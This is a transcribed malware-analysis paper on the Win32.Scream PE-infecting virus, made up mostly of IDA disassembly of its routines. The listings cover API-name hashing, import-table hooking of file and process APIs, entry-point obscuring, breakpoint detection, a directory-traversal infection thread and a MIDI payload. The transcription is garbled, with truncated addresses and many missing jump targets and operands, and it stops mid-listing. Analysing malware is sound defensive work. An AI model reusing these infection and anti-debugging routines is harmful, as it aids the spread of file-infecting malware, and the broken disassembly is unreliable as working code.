Analysis of Win32.Scream

Transcription

1 Analysis of Win32.Scream 1. Introduction Scream is a very interesting virus as it combines a lot of techniques written inside of it. In this paper I ll cover all of its features and internals. I ll dissect it from a top bottom approach for better analysis. Moreover, the virus appears to be undetected by all Anti Virus scanners. So, I ll refer to it by the name it was hard coded inside of it (Win32.Scream). Most of the analysis was done with the help of a disassembler (IDA) and some other private tools. 2. Features As I have mentioned before, the virus contains a lot of techniques in which I haven t seen in a virus before. And that s what makes it more interesting. Some of the features of the virus are: API Hooking Engine. Stealth API Calls. Entry Point Obscuring (EPO). Hard Coded Memory Access (HMA). Instruction Length Engine (ILE). Encryption/Decryption Engine (RDKE32). Random Generation Number Engine (MT). Those are just some of the interesting features of the virus but, the list can go. However, for the sake of the moment I just listed some of them. 3. Pre Analysis A non so complex per process resident, entry point obscuring (EPO) virus, which infects PE files. On runtime it launches a thread for directory traversal infection HMA What this engine does is that it remove delta offset for good. It changes all [mem32] with a new mem32 address. But, one have to calculate that address himself and pass it to the engine. The

2 engine will change all hardcoded memory accesses except if operand, address or FS segment prefix is used ILE What this engine does is that it calculates the instruction length. It Load up ESI with pointer to the instruction one wants to get its size RDKE32 The Random Decoding Key Engine (RKDE32) encrypts and decrypts the virus infection code with SHA RNGMT What this engine does is that it generates random numbers based on a matrix linear recurrence over a finite binary field. It provides for fast generation of very high quality pseudorandom numbers, having been designed specifically to rectify many of the flaws found in older algorithms. 4. Analysis CODE: C nop CODE: D mov esi, offset _debug CODE: mov esi, offset FRD_Imported_Kernel32_API_Names CODE: mov edi, offset CRC32_Imported_Kernel32_API_Names CODE: C call FRC_MakeCRC32Table CODE: C CODE:004046A1 mov esi, offset FRD_Imported_Imagehlp_API_Names CODE:004046A6 mov edi, offset CRC32_Imported_Imagehlp_API_Names CODE:004046AB call FRC_MakeCRC32Table CODE:004046AB CODE:004046B0 mov esi, offset FRD_Imported_Sfc_API_Names CODE:004046B5 mov edi, offset CRC32_Imported_Sfc_API_Names CODE:004046BA call FRC_MakeCRC32Table CODE:004046BA CODE:004046BF mov esi, offset FRD_Imported_WinMM_API_Names CODE:004046C4 mov edi, offset CRC32_Imported_WinMM_API_Names CODE:004046C9 call FRC_MakeCRC32Table

3 CODE:004046C9 CODE:004046CE mov esi, offset FRD_Imported_Shell32_API_Names CODE:004046D3 mov edi, offset CRC32_Imported_Shell32_API_Names CODE:004046D8 call FRC_MakeCRC32Table CODE:004046D8 CODE:004046DD mov esi, offset FRD_Hook_API_Names ; "CreateFileA" CODE:004046E2 mov edi, offset API_Hook_Table CODE:004046E2 CODE:004046E7 CODE:004046E7 mov al, [esi] CODE:004046E9 test al, al CODE:004046EB jz CODE:004046EB CODE:004046ED call GetCRC32OfString CODE:004046ED CODE:004046F2 mov [edi], ebx CODE:004046F4 add edi, 0Ch CODE:004046F7 jmp CODE:004046F7 CODE:004046F9 CODE:004046F9 CODE:004046F9 mov esi, offset FRD_File_Names CODE:004046FE mov edi, offset CRC32_KERNEL32_DLL CODE: call FRC_MakeCRC32Table CODE: CODE: push offset FRC_FakeHost CODE: D mov ER_CallingOffset, offset FRC_FakeHost CODE: mov ER_Code, h CODE: mov ER_Code_0, 90h CODE: jmp EntryPoint Before the virus runs it needs to do some pre work to setup its surroundings. First, it makes CRC32 Checksums for some API s to use later. And then it setup a fake EPO. After that it jumps to the real starting point for the virus. CODE: EntryPoint: CODE: CODE: pushf CODE: pusha CODE: cmp ThreadHandle, 0 CODE: jz CODE: CODE: B mov ecx, 24h CODE: call RestoreEPOBytes CODE: CODE: popa CODE: popf

4 CODE: retn CODE: CODE: CODE: CODE: CODE: call Initialize CODE: CODE: D test eax, eax CODE: F jz short CODE: F CODE: lea ebx, sub_4010ba CODE: mov [ebp+0c4h], ebx CODE: D lea ebx, CODE: mov [ebp+0c8h], ebx CODE: mov [ebp+0cch], esp CODE: F lea ebx, [ebp+0c0h] CODE: push ebx CODE: xor ebx, ebx CODE: push dword ptr fs:[ebx] CODE: B pop dword ptr [ebp+0c0h] CODE: pop dword ptr fs:[ebx] CODE: push CRC32_KERNEL32_DLL CODE: A call HookAPIs CODE: A CODE: F push CRC32_SHELL32_DLL CODE: call HookAPIs CODE: CODE: A push 0 CODE: C lea eax, MainThread CODE: push esp CODE: push 0 CODE: push 0 CODE: push eax CODE: push 0 CODE: A push 0 CODE: C mov al, 1Ah CODE: E call StealthAPI CODE: E CODE: mov ThreadHandle, eax CODE: pop ebx CODE: test eax, eax CODE: B jz CODE: B CODE: D push 0FFFFFFFEh CODE: F push eax CODE: mov al, 1Ch CODE: call StealthAPI CODE: CODE: call UnInitialize CODE: CODE: C CODE: C CODE: C mov ecx, 1024h CODE:004010A1 call RestoreEPOBytes CODE:004010A1 CODE:004010A6

5 CODE:004010A6 CODE:004010A6 xor ebx, ebx CODE:004010A8 push dword ptr [ebp+0c0h] CODE:004010AE pop dword ptr fs:[ebx] CODE:004010B1 add esp, 1000h CODE:004010B7 popa CODE:004010B8 popf CODE:004010B9 retn This is the real entry point for the virus. What it does is that it saves the registers so that it does not ruin the host s execution. Then it restores the EPO and returns back to the host if the thread was already running. If the thread was not running then it initializes the virus s environment to be able to work. This initialization routine will be discusses later. Also if nothing went wrong during the execution the virus restores the EPO and leaves the routine immediately. Anyways, the virus uses SEH through out the entire virus to avoid crashing under any circumstances. Afterwards, the virus hooks some API s that the hose might be using. Then start a thread that will run simultaneously with the host s code to perform a directory traversal search. Finally the virus cleans up after the changes it has made. And then return back to the host. CODE:004010E1 Initialize proc near CODE:004010E1 CODE:004010E1 CODE:004010E1 arg_0 = dword ptr 4 CODE:004010E1 SFC_BaseAddress = dword ptr 8 CODE:004010E1 WINMM_BaseAddress= dword ptr 0Ch CODE:004010E1 SHELL32_BaseAddress= dword ptr 10h CODE:004010E1 arg_14 = dword ptr 18h CODE:004010E1 arg_8c = dword ptr 90h CODE:004010E1 API_SFC_IN_MSTRUC= dword ptr 9Ch CODE:004010E1 API_WINMM_IN_MSTRUC= dword ptr 0A0h CODE:004010E1 arg_b8 = dword ptr 0BCh CODE:004010E1 arg_cc = dword ptr 0D0h CODE:004010E1 arg_d0 = dword ptr 0D4h CODE:004010E1 arg_d4 = dword ptr 0D8h CODE:004010E1 arg_d8 = dword ptr 0DCh CODE:004010E1 arg_1020 = dword ptr 1024h CODE:004010E1 CODE:004010E1 cmp InitializeState, 0 CODE:004010E8 jnz short Initialize CODE:004010E8 CODE:004010EA or InitializeState, 0FFFFFFFFh CODE:004010F1 pop ebx CODE:004010F2 mov ecx, 1000h CODE:004010F7 sub esp, ecx CODE:004010F9 mov ebp, esp CODE:004010FB mov PointerToMSTRUC, ebp CODE: cld CODE: xor eax, eax CODE: mov edi, esp CODE: rep stosb CODE: push ebx CODE: lea ebx, sub_401269

6 CODE: F mov [ebp+arg_d0], ebx CODE: lea ebx, CODE: B mov [ebp+arg_d4], ebx CODE: mov [ebp+arg_d8], esp CODE: lea ebx, [ebp+arg_cc] CODE: D push ebx CODE: E xor ebx, ebx CODE: push dword ptr fs:[ebx] CODE: pop [ebp+arg_cc] CODE: pop dword ptr fs:[ebx] CODE: C mov eax, [esp+arg_1020] CODE: rdtsc CODE: xchg eax, ebx CODE: xchg eax, edx CODE: mov ecx, 10h CODE: C div ecx CODE: E lea edi, Init_Key_Start CODE: xor [edi+edx*4], ebx CODE: push 10h CODE: push edi CODE: A call init_by_array CODE: A CODE: F call GetKernel32Base CODE: F CODE: lea eax, [ebp+arg_14] CODE: lea ebx, CRC32_Imported_Kernel32_API_Names CODE: D push dword ptr [ebp+0] CODE: push 1Eh CODE: push eax CODE: push ebx CODE: call GetAPIsFromCRC32List CODE: CODE: test eax, eax CODE: B jz CODE: B CODE: lea esi, NAME_IMAGEHLP_DLL CODE: push esi CODE: mov al, 3 CODE: A call StealthAPI CODE: A CODE: F test eax, eax CODE: CODE: CODE: mov [ebp+arg_0], eax CODE: A lea edx, [ebp+arg_8c] CODE:004011A0 lea ebx, CRC32_Imported_Imagehlp_API_Names CODE:004011A6 push eax CODE:004011A7 push 3 CODE:004011A9 push edx CODE:004011AA push ebx CODE:004011AB call GetAPIsFromCRC32List CODE:004011AB CODE:004011B0 test eax, eax CODE:004011B2 CODE:004011B2 CODE:004011B8 or SFC_enabled, 0FFFFFFFFh CODE:004011BF lea esi, NAME_SFC_DLL

7 CODE:004011C5 push esi CODE:004011C6 mov al, 3 CODE:004011C8 call StealthAPI CODE:004011C8 CODE:004011CD test eax, eax CODE:004011CF jz CODE:004011CF CODE:004011D1 mov [ebp+sfc_baseaddress], eax CODE:004011D4 lea edx, [ebp+api_sfc_in_mstruc] CODE:004011DA lea ebx, CRC32_Imported_Sfc_API_Names CODE:004011E0 push eax CODE:004011E1 push 1 CODE:004011E3 push edx CODE:004011E4 push ebx CODE:004011E5 call GetAPIsFromCRC32List CODE:004011E5 CODE:004011EA test eax, eax CODE:004011EC jz CODE:004011EC CODE:004011EE and SFC_enabled, 0 CODE:004011EE CODE:004011F5 CODE:004011F5 CODE:004011F5 lea esi, NAME_WINMM_DLL CODE:004011FB push esi CODE:004011FC mov al, 3 CODE:004011FE call StealthAPI CODE:004011FE CODE: test eax, eax CODE: jz CODE: CODE: mov [ebp+winmm_baseaddress], eax CODE: A lea edx, [ebp+api_winmm_in_mstruc] CODE: lea ebx, CRC32_Imported_WinMM_API_Names CODE: push eax CODE: push 7 CODE: push edx CODE: A push ebx CODE: B call GetAPIsFromCRC32List CODE: B CODE: test eax, eax CODE: jz CODE: CODE: lea esi, NAME_SHELL32_DLL CODE: A push esi CODE: B mov al, 3 CODE: D call StealthAPI CODE: D CODE: test eax, eax CODE: jz CODE: CODE: mov [ebp+shell32_baseaddress], eax CODE: lea edx, [ebp+arg_b8] CODE: F lea ebx, CRC32_Imported_Shell32_API_Names CODE: push eax CODE: push 1

8 CODE: push edx CODE: push ebx CODE: A call GetAPIsFromCRC32List CODE: A CODE: F test eax, eax CODE: jz short CODE: CODE: stc CODE: sbb eax, eax CODE: CODE: CODE: CODE: CODE: xor ebx, ebx CODE: push [ebp+arg_cc] CODE: E pop dword ptr fs:[ebx] CODE: and InitializeState, 0 CODE: retn CODE: Initialize endp In the previous block, the virus initializes it s surrounding to able to work correctly, what it does in brief is that it allocates memory and retrieves memory addresses. CODE: UnInitialize proc near CODE: CODE: push eax CODE: push dword ptr [ebp+4] CODE: mov al, 4 CODE: call StealthAPI CODE: CODE: B push dword ptr [ebp+8] CODE: E mov al, 4 CODE:004012A0 call StealthAPI CODE:004012A0 CODE:004012A5 push dword ptr [ebp+0ch] CODE:004012A8 mov al, 4 CODE:004012AA call StealthAPI CODE:004012AA CODE:004012AF push dword ptr [ebp+10h] CODE:004012B2 mov al, 4 CODE:004012B4 call StealthAPI CODE:004012B4 CODE:004012B9 pop eax CODE:004012BA retn CODE:004012BA CODE:004012BA UnInitialize endp The previous code block frees up the libraries that the virus has been using through out the code and then return back. CODE:004012BB RestoreEPOBytes proc near CODE:004012BB CODE:004012BB

9 CODE:004012BB arg_0 = dword ptr 4 CODE:004012BB CODE:004012BB mov ebx, [esp+ecx+arg_0] CODE:004012BF lea edi, [ebx-5] CODE:004012C2 mov [esp+ecx+arg_0], edi CODE:004012C6 mov ecx, 10h CODE:004012CB lea esi, ER_CallingOffset CODE:004012CB CODE:004012D1 CODE:004012D1 lodsd CODE:004012D2 cmp eax, ebx CODE:004012D4 jz CODE:004012D4 CODE:004012D6 add esi, 5 CODE:004012D9 CODE:004012D9 CODE:004012DB CODE:004012DB movsb CODE:004012DC movsd CODE:004012DD retn CODE:004012DD CODE:004012DD RestoreEPOBytes endp The previous code block gets the return address on the stack. Since this address points to after the code, it has to make it point to the start of its EPO code. Then it updates the return address on the stack. After that it restores the EPO that called it, searching through the data area to find the one that called the virus. CODE:004012DE MainThread proc near CODE:004012DE CODE:004012DE var_38 = dword ptr -38h CODE:004012DE arg_10e4 = dword ptr 10E8h CODE:004012DE CODE:004012DE pushf CODE:004012DF pusha CODE:004012E0 mov eax, PointerToMSTRUC CODE:004012E5 mov ThreadPointerToMSTRUC, eax CODE:004012EA call Initialize CODE:004012EA CODE:004012EF mov ebx, PointerToMSTRUC CODE:004012F5 xchg ebx, ThreadPointerToMSTRUC CODE:004012FB mov PointerToMSTRUC, ebx CODE: test eax, eax CODE: jnz CODE: CODE: popa CODE: popf CODE: retn CODE: CODE: ; CODE:

10 CODE: CODE: lea ebx, sub_4013fb CODE: E mov [ebp+114h], ebx CODE: lea ebx, CODE: A mov [ebp+118h], ebx CODE: mov [ebp+11ch], esp CODE: lea ebx, [ebp+110h] CODE: C push ebx CODE: D xor ebx, ebx CODE: F push dword ptr fs:[ebx] CODE: pop dword ptr [ebp+110h] CODE: pop dword ptr fs:[ebx] CODE: B lea esi, word_403f16 CODE: lea edi, InfectFile CODE: CODE: CODE: _debug: CODE: nop CODE: push 698h CODE: D push edi CODE: E push esi CODE: F call RDKE32Decrypt CODE: F CODE: cmp ThreadExecution, 0FFFFFFFFh CODE: B jz short CODE: B CODE: D or Infect_Encrypted, 0FFFFFFFFh CODE: mov ecx, 104h CODE: sub esp, ecx CODE: B push esp CODE: C push ecx CODE: D mov al, 0Dh CODE: F call StealthAPI CODE: F CODE: test eax, eax CODE: jz short CODE: CODE: push 5C3A43h CODE: CODE: D CODE: D CODE: D mov eax, 10h CODE: call RandomNumber CODE: CODE: inc eax CODE: mov [ebp+27ch], eax CODE: E push esp CODE: F mov al, 10h CODE: call StealthAPI CODE: CODE: cmp al, 2 CODE: jz CODE: CODE: A cmp al, 3 CODE: C jz CODE: C CODE: E cmp al, 4

11 CODE:004013A0 jnz short CODE:004013A0 CODE:004013A2 CODE:004013A2 CODE:004013A2 CODE:004013A2 push esp CODE:004013A3 mov al, 0Ch CODE:004013A5 call StealthAPI CODE:004013A5 CODE:004013AA call DirectoryTraversal CODE:004013AA CODE:004013AF cmp ThreadExecution, 0FFFFFFFFh CODE:004013B6 jz short CODE:004013B6 CODE:004013B8 CODE:004013B8 CODE:004013B8 cmp [esp+38h+var_38], '\:Z' CODE:004013BF jz short CODE:004013BF CODE:004013C1 inc [esp+38h+var_38] CODE:004013C4 jmp short CODE:004013C4 CODE:004013C6 CODE:004013C6 CODE:004013C6 CODE:004013C6 CODE:004013C6 pop edx CODE:004013C7 push esp CODE:004013C8 mov al, 0Ch CODE:004013CA call StealthAPI CODE:004013CA CODE:004013CF add esp, 104h CODE:004013CF CODE:004013D5 CODE:004013D5 CODE:004013D5 CODE:004013D5 CODE:004013D5 call UnInitialize CODE:004013D5 CODE:004013DA xor ebx, ebx CODE:004013DC push dword ptr [ebp+110h] CODE:004013E2 pop dword ptr fs:[ebx] CODE:004013E5 mov eax, [ebp+7ch] CODE:004013E8 mov [esp-0cch+arg_10e4], eax CODE:004013EF add esp, 1000h CODE:004013F5 popa CODE:004013F6 popf CODE:004013F7 push 0 CODE:004013F9 call eax CODE:004013F9 CODE:004013F9 MainThread endp The previous code block in brief allocates memory for the virus, retrieves API addresses, and decrypts the infection code and does a directory traversal search.

12 CODE: PayloadThread proc near CODE: CODE: arg_ff4 = dword ptr 0FF8h CODE: CODE: pushf CODE: pusha CODE: mov eax, PointerToMSTRUC CODE: mov Thread2PointerToMSTRUC, eax CODE: E call Initialize CODE: E CODE: mov ebx, PointerToMSTRUC CODE: xchg ebx, Thread2PointerToMSTRUC CODE: F mov PointerToMSTRUC, ebx CODE: test eax, eax CODE: jnz CODE: CODE: popa CODE: A popf CODE: B retn CODE: B CODE: C CODE: C CODE: C lea ebx, sub_4014b1 CODE: mov [ebp+124h], ebx CODE: lea CODE: E mov [ebp+128h], ebx CODE: mov [ebp+12ch], esp CODE: A lea ebx, [ebp+120h] CODE: push ebx CODE: xor ebx, ebx CODE: push dword ptr fs:[ebx] CODE: pop dword ptr [ebp+120h] CODE: C pop dword ptr fs:[ebx] CODE: F lea eax, Payload_Song CODE: push eax CODE: call PlayMidiSong CODE: CODE: B CODE: B call UnInitialize CODE: B CODE: xor ebx, ebx CODE: push dword ptr [ebp+120h] CODE: pop dword ptr fs:[ebx] CODE: B mov eax, [ebp+7ch] CODE: E mov [esp+24h+arg_ff4], eax CODE:004014A5 add esp, 1000h CODE:004014AB popa CODE:004014AC popf CODE:004014AD push 0 CODE:004014AF call eax CODE:004014AF CODE:004014AF PayloadThread endp

13 The previous code block plays a small midi tune as the payload of the virus. CODE:004014D8 StealthAPI proc near CODE:004014D8 CODE:004014D8 CODE:004014D8 var_24 = dword ptr -24h CODE:004014D8 CODE:004014D8 movzx eax, al CODE:004014DB mov eax, [ebp+eax*4+18h] CODE:004014DF pusha CODE:004014E0 push 0Ah CODE:004014E2 xchg eax, esi CODE:004014E2 CODE:004014E3 CODE:004014E3 cmp byte ptr [esi], 0CCh CODE:004014E6 jz CODE:004014E6 CODE:004014E8 cmp word ptr [esi], 0CD03h CODE:004014ED jz CODE:004014ED CODE:004014EF call ILE CODE:004014EF CODE:004014F4 add esi, ecx CODE:004014F6 jecxz CODE:004014F6 CODE:004014F8 dec [esp+24h+var_24] CODE:004014FB jnz CODE:004014FB CODE:004014FD CODE:004014FD pop eax CODE:004014FE popa CODE:004014FF jmp eax CODE:004014FF CODE: CODE: CODE: CODE: pop eax CODE: popa CODE: retn CODE: CODE: StealthAPI endp The previous code block contains the StealthAPI function which is one of the most important functions in this virus as it searches for breakpoints in the API code. CODE: PlayMidiSong proc near CODE: CODE: var_38 = dword ptr -38h CODE: arg_164 = dword ptr 168h CODE: CODE: pusha CODE: mov ecx, 178h

14 CODE: A sub esp, ecx CODE: C mov edi, esp CODE: E xor eax, eax CODE: rep stosb CODE: mov edi, esp CODE: lea eax, [edi] CODE: push 0 CODE: push 0 CODE: A push 0 CODE: C push 0FFFFFFFFh CODE: E push eax CODE: F mov al, 27h CODE: call StealthAPI CODE: CODE: test eax, eax CODE: CODE: CODE: E mov esi, [esp+34h+arg_164] CODE: lodsd CODE: xchg eax, ecx CODE: imul edx, ecx, 10h CODE: A add edx, esi CODE: C xor ebx, ebx CODE: C CODE: E CODE: E lodsd CODE: F mov [edi+ebx+10h], eax CODE: push eax CODE: lodsd CODE: xchg eax, [esp+38h+var_38] CODE: push eax CODE: add eax, 0B0h CODE: E push 0 CODE: push 0 CODE: push eax CODE: call SendData CODE: CODE: pop eax CODE: add eax, 0C0h CODE: E push 0 CODE: push [esp+3ch+var_38] CODE: push eax CODE: call SendData CODE: CODE: A pop eax CODE: B lodsd CODE: C mov [edi+ebx+14h], eax CODE: lodsd CODE: mov [edi+ebx+18h], eax CODE: mov [edi+ebx+1ch], edx CODE: add edx, eax CODE: B add ebx, 18h CODE: E CODE: E CODE: and dword ptr [edi+0ch], 0 CODE:

15 CODE: CODE: CODE: and dword ptr [edi+8], 0 CODE: mov ecx, 0Fh CODE: D xor ebx, ebx CODE: D CODE: F CODE: F mov esi, [edi+ebx+1ch] CODE: mov edx, [edi+ebx+10h] CODE: add edx, 90h CODE: D mov eax, [edi+ebx+18h] CODE:004015A1 add eax, [edi+ebx+20h] CODE:004015A5 test eax, eax CODE:004015A7 jz CODE:004015A7 CODE:004015A9 or dword ptr [edi+8], 0FFFFFFFFh CODE:004015AD cmp dword ptr [edi+0ch], 0 CODE:004015B1 jz CODE:004015B1 CODE:004015B3 dec dword ptr [edi+ebx+20h] CODE:004015B7 jnz CODE:004015B7 CODE:004015B9 cmp byte ptr [edi+ebx+24h], 80h CODE:004015BE jz CODE:004015BE CODE:004015C0 sub esi, 5 CODE:004015C3 push ecx CODE:004015C4 mov ecx, 5 CODE:004015C9 xor eax, eax CODE:004015C9 CODE:004015CB CODE:004015CB push 0 CODE:004015CD lodsb CODE:004015CE push eax CODE:004015CF push edx CODE:004015D0 call SendData CODE:004015D0 CODE:004015D5 CODE:004015D5 CODE:004015D7 pop ecx CODE:004015D7 CODE:004015D8 CODE:004015D8 CODE:004015D8 mov eax, [edi+ebx+18h] CODE:004015DC test eax, eax CODE:004015DE jz CODE:004015DE CODE:004015E0 lodsb CODE:004015E1 dec dword ptr [edi+ebx+18h] CODE:004015E5 mov ah, al CODE:004015E7 and ah, 80h CODE:004015EA mov [edi+ebx+24h], ah CODE:004015EE and al, 7Fh CODE:004015F0 mov [edi+ebx+20h], al

16 CODE:004015F4 test ah, ah CODE:004015F6 jnz short CODE:004015F6 CODE:004015F8 push ecx CODE:004015F9 mov ecx, 5 CODE:004015FE sub [edi+ebx+18h], ecx CODE: xor eax, eax CODE: CODE: CODE: push dword ptr [edi+ebx+14h] CODE: lodsb CODE: push eax CODE: A push edx CODE: B call SendData CODE: B CODE: CODE: CODE: pop ecx CODE: CODE: CODE: mov [edi+ebx+1ch], esi CODE: CODE: CODE: CODE: add ebx, 18h CODE: A dec ecx CODE: B CODE: B CODE: or dword ptr [edi+0ch], 0FFFFFFFFh CODE: push 50h CODE: mov al, 1 CODE: call StealthAPI CODE: CODE: E cmp dword ptr [edi+8], 0 CODE: CODE: CODE: push dword ptr [edi] CODE: A mov al, 24h CODE: C call StealthAPI CODE: C CODE: CODE: add esp, 178h CODE: popa CODE: retn 4 CODE: CODE: PlayMidiSong endp The previous code block plays an embedded midi song hard coded in the virus as notes. CODE: B SendData CODE: B proc near

17 CODE: B CODE: B ARG1 = dword ptr 4 CODE: B ARG2 = dword ptr 8 CODE: B ARG3 = dword ptr 0Ch CODE: B CODE: B pusha CODE: C mov eax, [esp+20h+arg3] CODE: shl eax, 10h CODE: mov ebx, [esp+20h+arg2] CODE: shl ebx, 8 CODE: A add eax, ebx CODE: C add eax, [esp+20h+arg1] CODE: push eax CODE: push dword ptr [edi] CODE: mov al, 28h CODE: call StealthAPI CODE: CODE: A test eax, eax CODE: C popa CODE: D retn 0Ch CODE: D CODE: D SendData endp The previous code block is used to send data to the midi output device. CODE: HookAPIs proc near CODE: CODE: pusha CODE: push 0 CODE: mov al, 2 CODE: call StealthAPI CODE: CODE: A xchg eax, ebx CODE: B mov esi, [ebx+3ch] CODE: E mov esi, [ebx+esi+80h] CODE: add esi, ebx CODE: CODE: CODE: cmp dword ptr [esi], 0 CODE: A jz CODE: A CODE: C push esi CODE: D mov esi, [esi+0ch] CODE: add esi, ebx CODE: push ebx CODE: call Uppercase CODE: CODE: call GetCRC32OfString CODE: CODE: D cmp [esp+2ch], ebx CODE:004016A1 jz CODE:004016A1 CODE:004016A3 pop ebx CODE:004016A4 pop esi

18 CODE:004016A5 add esi, 14h CODE:004016A8 jmp short CODE:004016A8 CODE:004016AA ; CODE:004016AA CODE:004016AA pop ebx CODE:004016AB pop esi CODE:004016AC xor ecx, ecx CODE:004016AE mov edx, [esi+10h] CODE:004016B1 add edx, ebx CODE:004016B3 mov esi, [esi] CODE:004016B5 add esi, ebx CODE:004016B5 CODE:004016B7 CODE:004016B7 lodsd CODE:004016B8 test eax, eax CODE:004016BA jz CODE:004016BA CODE:004016BC push esi CODE:004016BD lea esi, [eax+ebx+2] CODE:004016C1 lea edi, API_Hook_Table CODE:004016C7 cmp al, 80h CODE:004016C9 jz CODE:004016C9 CODE:004016CB CODE:004016CB cmp byte ptr [edi], 0 CODE:004016CE jz CODE:004016CE CODE:004016D0 push esi CODE:004016D1 push ebx CODE:004016D2 call GetCRC32OfString CODE:004016D2 CODE:004016D7 cmp [edi], ebx CODE:004016D9 pop ebx CODE:004016DA jz CODE:004016DA CODE:004016DC CODE:004016DC pop esi CODE:004016DD add edi, 0Ch CODE:004016E0 jmp CODE:004016E0 CODE:004016E2 ; CODE:004016E2 CODE:004016E2 lea esi, [edx+ecx*4] CODE:004016E5 mov eax, [esi] CODE:004016E7 mov [edi+8], eax CODE:004016EA lea eax, EntryPoint CODE:004016F0 add eax, [edi+4] CODE:004016F3 mov [esi], eax CODE:004016F5 jmp

19 CODE:004016F5 CODE:004016F7 ; CODE:004016F7 CODE:004016F7 CODE:004016F7 pop esi CODE:004016F8 inc ecx CODE:004016F9 jmp CODE:004016F9 CODE:004016FB ; CODE:004016FB CODE:004016FB CODE:004016FB popa CODE:004016FC retn 4 CODE:004016FC CODE:004016FC HookAPIs endp The previous code block hooks several API s which is also known as per process residency. CODE:004016FF call GenericHookHandler CODE:004016FF CODE: jmp AH_CreateFileA CODE: CODE: A CODE: A call GenericHookHandler CODE: A CODE: F jmp AH_WinExec CODE: F CODE: CODE: call GenericHookHandler CODE: CODE: A jmp AH_OpenFile CODE: A CODE: CODE: call GenericHookHandler CODE: CODE: jmp AH lopen CODE: CODE: B CODE: B call GenericHookHandler CODE: B CODE: jmp AH_CreateProcessA CODE: CODE: CODE: call GenericHookHandler CODE: CODE: B jmp AH_CopyFileA CODE: B CODE: CODE: call GenericHookHandler CODE: CODE: jmp AH_MoveFileA

20 CODE: CODE: C CODE: C call GenericHookHandler CODE: C CODE: jmp AH_MoveFileExA CODE: CODE: CODE: call GenericHookHandler CODE: CODE: C jmp AH_FindFirstFileA CODE: C CODE: CODE: call GenericHookHandler CODE: CODE: jmp AH_GetFullPathNameA CODE: CODE: D CODE: D call GenericHookHandler CODE: D CODE: jmp AH_GetShortPathNameA CODE: CODE: CODE: call GenericHookHandler CODE: CODE: D jmp AH_SetFileAttributesA CODE: D CODE: CODE: call GenericHookHandler CODE: CODE: jmp AH_GetFileAttributesA CODE: CODE: E CODE: E call GenericHookHandler CODE: E CODE: jmp AH_GetBinaryTypeA CODE: CODE: CODE: pushf CODE: A pusha CODE: B call Initialize CODE: B CODE:004017A0 test eax, eax CODE:004017A2 jz short loc_4017cf CODE:004017A2 CODE:004017A4 or ThreadExecution, 0FFFFFFFFh CODE:004017AB push 0FFFFh CODE:004017B0 push ThreadHandle CODE:004017B6 mov al, 1Bh CODE:004017B8 call StealthAPI CODE:004017B8 CODE:004017BD push ThreadHandle CODE:004017C3 mov al, 5 CODE:004017C5 call StealthAPI CODE:004017C5 CODE:004017CA call UnInitialize CODE:004017CA CODE:004017CF

21 CODE:004017CF loc_4017cf: CODE:004017CF add esp, 1000h CODE:004017D5 popa CODE:004017D6 popf CODE:004017D7 jmp AH_ExitProcess CODE:004017D7 CODE:004017DD CODE:004017DD pushf CODE:004017DE pusha CODE:004017DF call Initialize CODE:004017DF CODE:004017E4 test eax, eax CODE:004017E6 jz short loc_40184a CODE:004017E6 CODE:004017E8 mov eax, 3 CODE:004017ED call RandomNumber CODE:004017ED CODE:004017F2 test eax, eax CODE:004017F4 jnz short loc_40184a CODE:004017F4 CODE:004017F6 push 0 CODE:004017F8 lea eax, PayloadThread CODE:004017FE push esp CODE:004017FF push 0 CODE: push 0 CODE: push eax CODE: push 0 CODE: push 0 CODE: mov al, 1Ah CODE: A call StealthAPI CODE: A CODE: F pop ebx CODE: test eax, eax CODE: jz short loc_40184a CODE: CODE: push eax CODE: mov al, 5 CODE: call StealthAPI CODE: CODE: C push 0 CODE: E lea eax, szpayloadmessage CODE: push eax CODE: lea eax, szpayloadtitle CODE: B push eax CODE: C push dword ptr [esp+1034h] CODE: mov al, 29h CODE: call StealthAPI CODE: CODE: A call UnInitialize CODE: A CODE: F add esp, 1000h CODE: popa CODE: popf CODE: retn 10h CODE: CODE: A CODE: A

22 CODE: A loc_40184a: CODE: A CODE: A call UnInitialize CODE: A CODE: F add esp, 1000h CODE: popa CODE: popf CODE: jmp AH_ShellAboutA The previous code block was a series of handlers for the hooked API functions. CODE: D GenericHookHandler proc near CODE: D CODE: D CODE: D arg_ff8 = dword ptr 0FFCh CODE: D arg_1004 = dword ptr 1008h CODE: D CODE: D pushf CODE: E pusha CODE: E CODE: F CODE: F cmp GenericHookState, 0 CODE: jnz CODE: CODE: or GenericHookState, 0FFFFFFFFh CODE: F call Initialize CODE: F CODE: test eax, eax CODE: jz CODE: CODE: cmp Infect_Encrypted, 0 CODE: F jz CODE: F CODE: mov esi, [esp+24h+arg_1004] CODE: lea edi, [ebp+13ch] CODE: E push edi CODE: F push esi CODE: mov al, 16h CODE: call StealthAPI CODE: CODE: inc eax CODE: jz CODE: CODE: A dec eax CODE: B push eax CODE: C mov al, 5 CODE: E call StealthAPI CODE: E CODE:004018A3 lea edi, [ebp+168h] CODE:004018A9 mov esi, [esp+30h+arg_ff8] CODE:004018A9 CODE:004018B0 CODE:004018B0 lodsb

23 CODE:004018B1 stosb CODE:004018B2 test al, al CODE:004018B4 jnz short CODE:004018B4 CODE:004018B6 call InfectFile CODE:004018B6 CODE:004018BB CODE:004018BB CODE:004018BB CODE:004018BB add esp, 1000h CODE:004018C1 and GenericHookState, 0 CODE:004018C8 popa CODE:004018C9 popf CODE:004018CA retn CODE:004018CA CODE:004018CA GenericHookHandler endp The previous code block is a generic hook handler routine for hooked API. CODE:004018CB Uppercase proc near CODE:004018CB CODE:004018CB pusha CODE:004018CC mov edi, esi CODE:004018CC CODE:004018CE CODE:004018CE lodsb CODE:004018CF cmp al, 'a' CODE:004018D1 jb CODE:004018D1 CODE:004018D3 cmp al, 'z' CODE:004018D5 ja CODE:004018D5 CODE:004018D7 and al, b CODE:004018D7 CODE:004018D9 CODE:004018D9 CODE:004018D9 stosb CODE:004018DA test al, al CODE:004018DC jnz CODE:004018DC CODE:004018DE popa CODE:004018DF retn CODE:004018DF CODE:004018DF Uppercase endp The previous code block reformats a string to be all uppercase. CODE:004018E0 RandomNumber proc near CODE:004018E0 CODE:004018E0 CODE:004018E0 var_4 = dword ptr -4 CODE:004018E0

